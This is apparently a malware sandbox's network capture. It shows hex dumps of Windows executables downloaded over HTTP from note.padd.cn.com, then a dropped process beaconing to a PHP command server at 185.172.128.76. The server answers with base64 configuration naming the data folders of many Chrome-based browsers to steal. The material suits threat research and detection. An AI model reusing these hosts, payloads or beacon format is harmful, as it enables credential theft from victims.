00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 b4 15 02 04 e8 2f 02 00 00 68 d9 ed Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AlFAlFAlFLFYlFLF9lFLFmlFHFFlFAmF/lFyF@lFLF@lFyF@lFRichAlFPEL8efE9@PgQP08G@.text `.rdata kl@@.data`N@.rsrc0@@/h
Apr 23, 2024 09:43:11.178518057 CEST	1289	IN	Data Raw: 40 00 e8 ff 22 00 00 59 c3 b9 bc 15 02 04 e8 82 02 00 00 68 cf ed 40 00 e8 e9 22 00 00 59 c3 b9 a8 15 02 04 e8 d9 02 00 00 68 c5 ed 40 00 e8 d3 22 00 00 59 c3 6a 00 b9 b0 15 02 04 e8 cf 00 00 00 c3 6a 00 b9 a4 15 02 04 e8 c2 00 00 00 c3 6a 00 b9 Data Ascii: @"Yh@"Yh@"YjjjjUVEP$A^]$AfUVEtV"Y^]UE]UE8u3]P}Y]U}uE]]FU}
Apr 23, 2024 09:43:11.178528070 CEST	1289	IN	Data Raw: 53 8d 45 a8 50 53 ff 15 8c f0 40 00 53 53 53 53 ff 15 40 f0 40 00 8b 45 f0 8b 0d 98 15 02 04 2b f8 89 7d dc 83 f9 0c 75 07 53 ff 15 84 f0 40 00 8b c7 c1 e0 04 89 45 fc 8b 45 d4 01 45 fc 89 5d ec 8b 45 f8 01 45 ec 8b 45 dc 90 01 45 ec 8b 45 ec 89 Data Ascii: SEPS@SSSS@@E+}uS@EEE]EEEEEEMEEEEMU3E3U*E)EMt]UuE~_^[]V5W=tNu_^UQeEE]UQQhEAT
Apr 23, 2024 09:43:11.178539991 CEST	1289	IN	Data Raw: 3d 98 15 02 04 00 04 00 00 75 4f 57 57 57 ff 15 4c f0 40 00 57 57 57 57 ff 15 64 f0 40 00 57 ff 15 08 f0 40 00 57 57 57 57 ff 15 74 f0 40 00 57 57 57 57 ff 15 84 f1 40 00 57 e8 c6 15 00 00 57 e8 0b 1b 00 00 57 e8 7c 1b 00 00 57 e8 f3 18 00 00 57 Data Ascii: =uOWWWL@WWWWd@W@WWWWt@WWWW@WWW\|WW@8q Fr\|Wx@{+F\|@WD@W<@X~}5EzuFT\|\|A=u@Nu_3^]U
Apr 23, 2024 09:43:11.178551912 CEST	1289	IN	Data Raw: 0c 00 76 14 ff 75 0c 8b cf e8 07 ff ff ff 50 53 e8 a9 f1 ff ff 83 c4 0c 6a 00 6a 01 8b cf e8 a3 fc ff ff 8d 45 e8 8b cf 50 57 8d 45 ee 50 e8 02 fd ff ff 8b c8 e8 6c 00 00 00 ff 75 0c 8b cf 89 77 14 e8 e5 fd ff ff 8b 4d f4 5f 5e 64 89 0d 00 00 00 Data Ascii: vuPSjjEPWEPluwM_^d[]Mjj`jj>UuY]U]UM.]UVM/UP'^]3twQYuUVWM
Apr 23, 2024 09:43:11.178563118 CEST	1289	IN	Data Raw: f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 8b 04 8d 78 25 40 00 ff e0 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03 83 f9 08 72 2a f3 a5 ff 24 95 78 25 40 00 90 8b c7 ba 03 00 00 00 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 8c 24 40 00 ff 24 8d Data Ascii: ~vfx%@ur*$x%@r$$@$%@$%@$@$@$@#FGFGr$x%@I#FGr$x%@#r$x%@Io%@\%@T%@L%@D%@<%@
Apr 23, 2024 09:43:11.178580999 CEST	1289	IN	Data Raw: 00 eb 06 8b 47 04 89 46 04 5f 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 c7 06 34 00 41 00 e8 52 00 00 00 f6 45 08 01 74 07 56 e8 e2 09 00 00 59 8b c6 5e 5d c2 04 00 55 8b ec 83 7d 08 00 53 8b d9 74 2d 57 ff 75 08 e8 db 06 00 00 8d 78 01 57 e8 ea 19 Data Ascii: GF_^]UV4AREtVY^]U}St-WuxWCYYtuWPiC_[]V~tveYfF^Au<AWVt$L$\|$;v;h%PCs3u%`
Apr 23, 2024 09:43:11.178591967 CEST	1289	IN	Data Raw: 40 00 8d 49 00 68 2e 40 00 70 2e 40 00 78 2e 40 00 80 2e 40 00 88 2e 40 00 90 2e 40 00 98 2e 40 00 ab 2e 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 Data Ascii: @Ih.@p.@x.@.@.@.@.@.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fof
Apr 23, 2024 09:43:11.178605080 CEST	1289	IN	Data Raw: fc ff ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 6e 21 00 00 83 c4 0c 5d c3 6a 10 68 88 4d 41 00 e8 11 12 00 00 83 cf ff 89 7d e4 33 c0 39 45 08 0f 95 c0 85 c0 75 18 e8 9e 0f 00 00 c7 00 16 00 00 00 e8 24 0f 00 00 8b c7 e8 2d 12 00 00 c3 e8 70 14 00 00 Data Ascii: Ujjun!]jhMA}39Eu$-p @@uYP"Y;ttpCXeA@$u;ttpCXeAB$u PjCYYe PEu1 PVju
Apr 23, 2024 09:43:11.178611040 CEST	1289	IN	Data Raw: d6 89 45 d8 ff 35 90 26 02 04 ff d6 8b 4d d8 39 4d e4 75 05 39 45 e0 74 ae 89 4d e4 8b d9 89 5d d4 89 45 e0 8b f8 eb 9c 68 e4 f1 40 00 68 d4 f1 40 00 e8 bb fe ff ff 59 59 68 ec f1 40 00 68 e8 f1 40 00 e8 aa fe ff ff 59 59 c7 45 fc fe ff ff ff e8 Data Ascii: E5&M9Mu9EtM]Eh@h@YYh@h@YYE }u)Cj'Yu\}tj'YUjju]Uul/YtugYt]jEE@PMh\|LAEE@P}@
Apr 23, 2024 09:43:11.382855892 CEST	1289	IN	Data Raw: ec 00 74 17 64 8b 1d 00 00 00 00 8b 03 8b 5d c8 89 03 64 89 1d 00 00 00 00 eb 09 8b 45 c8 64 a3 00 00 00 00 8b 45 fc 5b 8b e5 5d c3 55 8b ec 51 51 8b 45 08 53 8b 5d 0c 56 8b 70 0c 8b 48 10 89 4d f8 89 75 fc 57 8b fe 85 db 78 33 8b 55 10 83 fe ff Data Ascii: td]dEdE[]UQQES]VpHMuWx3Uu)*MUNk9T};T~u}KuyEF0E8E;xw;v)Mk_^[]UQSEEddE]mc[]UQQSVWd5uEd>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49702	176.97.76.106	80	5496	C:\Users\user\Desktop\zLwT7vCojz.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 09:43:12.944147110 CEST	186	OUT	GET /1/Qg_Appv5.exe HTTP/1.1 Host: note.padd.cn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:43:13.177037954 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 07:28:17 GMT Content-Type: application/octet-stream Content-Length: 8538160 Last-Modified: Mon, 22 Apr 2024 21:57:43 GMT Connection: keep-alive ETag: "6626dd57-824830" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 41 fc f8 63 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 cc 0d 00 00 28 74 00 00 00 00 00 e8 e4 0d 00 00 10 00 00 00 f0 0d 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 82 00 00 04 00 00 29 e5 82 00 02 00 40 01 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 28 34 00 00 00 30 10 00 a4 8a 72 00 00 00 00 00 00 00 00 00 00 f8 81 00 30 50 00 00 00 f0 0e 00 78 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 89 0e 00 10 08 00 00 00 c0 0e 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 b2 0d 00 00 10 00 00 00 b4 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 54 16 00 00 00 d0 0d 00 00 18 00 00 00 b8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 2c 27 00 00 00 f0 0d 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 20 53 00 00 00 20 0e 00 00 00 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 28 34 00 00 00 80 0e 00 00 36 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 f6 03 00 00 00 c0 0e 00 00 04 00 00 00 2e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 3c 00 00 00 00 d0 0e 00 00 00 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 0e 00 00 02 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 36 01 00 00 f0 0e 00 00 38 01 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 a4 8a 72 00 00 30 10 00 00 8c 72 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 00 00 00 00 00 7a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PELAc(t@)@@(40r0Px6.text `.itextT `.data,'(@.bss S .idata(46@.didata.@.tls<2.rdata2@@.reloch684@B.rsrcr0rl@@@z@@
Apr 23, 2024 09:43:13.177057981 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 Data Ascii: @Boolean@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@
Apr 23, 2024 09:43:13.177074909 CEST	1289	IN	Data Raw: 43 00 f4 ff 01 17 40 00 43 00 f4 ff 2c 17 40 00 43 00 f4 ff 55 17 40 00 43 00 f4 ff 81 17 40 00 43 00 f4 ff bd 17 40 00 43 00 f4 ff f8 17 40 00 43 00 f4 ff 33 18 40 00 43 00 f4 ff 79 18 40 00 42 00 f4 ff b3 18 40 00 42 00 f4 ff ed 18 40 00 42 00 Data Ascii: C@C,@CU@C@C@C@C3@Cy@B@B@B3@Cq@C@C@J@J3@Jf@J@J@J#@J\@J@K@J@MTObject&\N@Create@Self$
Apr 23, 2024 09:43:13.177092075 CEST	1289	IN	Data Raw: 00 04 53 65 6c 66 02 00 08 1c 1c 40 00 01 00 03 4f 62 6a 02 00 02 00 2b 00 50 4f 40 00 0b 47 65 74 48 61 73 68 43 6f 64 65 03 00 9c 10 40 00 08 00 01 08 1c 1c 40 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 50 51 40 00 08 54 6f 53 74 72 69 6e 67 03 Data Ascii: Self@Obj+PO@GetHashCode@@Self3PQ@ToString\@@Self@\@[HQ@SafeCallException@@Self@ExceptObject@ExceptAddr1hQ@AfterConstruction
Apr 23, 2024 09:43:13.177109957 CEST	1289	IN	Data Raw: 00 00 00 8c 1e 40 00 01 00 00 00 00 02 00 0c 1f 40 00 14 09 50 56 61 72 41 72 72 61 79 20 1f 40 00 02 00 00 00 00 24 1f 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 Data Ascii: @@PVarArray @$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data@Bounds@TVarData@VType@Res
Apr 23, 2024 09:43:13.177129984 CEST	1289	IN	Data Raw: 00 00 00 02 0a 49 64 65 6e 74 69 66 69 65 72 02 00 02 00 00 00 1c 24 40 00 14 10 50 45 78 63 65 70 74 69 6f 6e 52 65 63 6f 72 64 34 24 40 00 02 00 38 24 40 00 0e 10 54 45 78 63 65 70 74 69 6f 6e 52 65 63 6f 72 64 50 00 00 00 00 00 00 00 00 08 00 Data Ascii: Identifier$@PExceptionRecord4$@8$@TExceptionRecordP@ExceptionCode@ExceptionFlags$@ExceptionRecord@ExceptionAddress@NumberParametersExceptionInform
Apr 23, 2024 09:43:13.177165985 CEST	1289	IN	Data Raw: 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 8b 48 28 89 4a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 8b 48 30 89 4a 30 df 7a 28 df 7a 20 df Data Ascii: zzz:@(hhhh H(J(z zzz:(hhhh h(H0J0z(z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l\|<x,<DD
Apr 23, 2024 09:43:13.177186966 CEST	1289	IN	Data Raw: fe 2c 0a 04 00 76 08 8b c7 83 e8 10 89 70 08 8b d3 8b c7 8b ce e8 d5 fb ff ff 8b c7 e8 8e 03 00 00 8b c3 83 c4 20 5d 5f 5e 5b c3 8d 50 03 c1 ea 03 3d 2c 0a 00 00 53 8a 0d 51 20 4e 00 0f 87 48 02 00 00 84 c9 0f b6 82 e0 28 4e 00 8d 1c c5 78 f0 4d Data Ascii: ,vp ]_^[P=,SQ NH(NxMuVSB9tB#HJPt([SK;CwvBKP[JYK[#t #t #t@=(NujH#_
Apr 23, 2024 09:43:13.177206039 CEST	1289	IN	Data Raw: 30 0b 00 00 72 c2 e8 f7 f6 ff ff eb bb 90 8b 4e f8 29 ce 01 cb 81 f9 30 0b 00 00 72 b1 89 f0 e8 de f6 ff ff eb a8 81 3d 3c 2a 4e 00 e0 ff 13 00 75 2c 83 ee 10 8b 06 8b 56 04 89 50 04 89 02 c6 05 37 2a 4e 00 00 68 00 80 00 00 6a 00 56 e8 cb f3 ff Data Ascii: 0rN)0r=<Nu,VP7NhjV^[9C<N8N7*N1^[[HSVK9r7@9r^[Ot^[
Apr 23, 2024 09:43:13.177222967 CEST	1289	IN	Data Raw: c1 e8 19 81 e2 ff ff ff 01 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 17 81 e2 ff ff 7f 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 Data Ascii: 000?000G_@SVM^[St@[dM4dM[USvh
Apr 23, 2024 09:43:13.409862041 CEST	1289	IN	Data Raw: e8 3b 0b 00 00 8d 85 dc 07 fe ff 33 c9 ba 00 40 00 00 e8 29 0b 00 00 33 c0 89 85 f8 47 fe ff c6 85 ff 47 fe ff 01 8b 3d 2b 2a 4e 00 e9 82 00 00 00 8b c7 e8 c4 f9 ff ff 8b d8 85 db 74 72 8b c3 83 e8 04 8b 30 f7 c6 01 00 00 00 75 56 f7 c6 04 00 00 Data Ascii: ;3@)3GG=+Ntr0uVtUYCG}7G5u GGGG.u'NrJN7u&GsG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49703	185.172.128.76	80	3912	C:\Users\user\AppData\Local\Temp\u48o.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 09:43:13.365490913 CEST	417	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFC Host: 185.172.128.76 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 32 44 30 30 41 35 41 30 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"5F2D00A5A0C62507286958------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default10------AAEBAFBGIDHCBFHIECFC--
Apr 23, 2024 09:43:13.753421068 CEST	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 5a 6a 6c 6c 59 57 52 6c 5a 57 4e 6a 5a 57 5a 6d 4d 44 4e 69 4e 47 46 6a 4d 6a 59 7a 4e 32 49 77 4d 44 41 78 4d 47 49 77 4e 54 68 68 4d 6d 49 34 59 6a 42 6c 5a 47 52 68 5a 6a 68 6d 4d 44 4e 6c 59 57 59 7a 5a 6a 63 30 4e 44 49 31 4d 6a 41 79 59 32 5a 69 59 6d 51 30 4e 7a 42 6b 4e 54 63 34 66 44 45 34 4d 54 67 78 4e 6a 5a 38 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 56 38 4d 58 77 77 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 41 3d 3d Data Ascii: ZjllYWRlZWNjZWZmMDNiNGFjMjYzN2IwMDAxMGIwNThhMmI4YjBlZGRhZjhmMDNlYWYzZjc0NDI1MjAyY2ZiYmQ0NzBkNTc4fDE4MTgxNjZ8NTE5MTkxODg1LmZpbGV8MXwwfDF8MXwxfDF8MXwxfA==
Apr 23, 2024 09:43:13.760483980 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="message"browsers------IEBFHCAKFBGDHIDHIDBK--
Apr 23, 2024 09:43:14.069288015 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhd